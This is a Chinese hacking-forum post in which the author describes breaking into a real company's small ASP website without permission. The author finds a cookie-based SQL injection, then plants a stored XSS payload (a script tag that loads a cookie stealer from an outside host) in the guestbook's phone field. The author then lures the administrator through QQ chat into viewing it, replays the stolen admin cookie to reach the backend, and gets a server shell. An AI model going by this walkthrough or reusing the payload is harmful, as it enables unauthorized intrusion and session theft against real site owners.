D0000D发往论坛板块-------------------------------------------------------
No2  号板块  技术文章
D8888D贴子标题-------------------------------------------------------
弄个站的经验分享一下没啥技术含量！
D8888D主贴内容-------------------------------------------------------
 

我也不上图了我也弄不明白那张图应该抓呵呵就说说过程吧！

目标站信息 2003 SP2 支持ASP 同ACCESS 内网服务器， 服务器上就一个站，别的啥也没有！

测试找出来个COOKIES注入点！注出来的密码是30位的解不开，不知道是什么方法加的密。这个站源

程序找不到，也扫不出后台。没办法又把站仔细的看了一遍，确定就一个新闻系统，同一个客户留言系

统可以做文章，新闻没有上传就有一个注入，注出来的还是30位加密的！找不到后台。看来指能在留言

上下手了，当时我也不知道该怎么弄了。抱这试试看的态度。试了一下，XSS在客户电话的那个地方插

入代码。
'><script src=http://XXX/cookies.asp></script>

插入后看了一下以留言回复时间最近的管理员回复在2008年，看来这个站的管理员可能把这个站都忘了
，于是在网站上找到管理员的QQ同他聊了会一下他们的产品然后问他：我在你们网站留言了怎么等

不到回复？

于是我马上在我收COOKIES的地方里收到了一个COOKIES里面自然记录了网站的后台地址。马上用

这个COOKIES欺骗一下，成功进入后台，拿到Shell同Servers。（完）

可能是我运气好！！没啥营养的文章。别算我灌水就好！

偷COOKIES的东东在上楼！
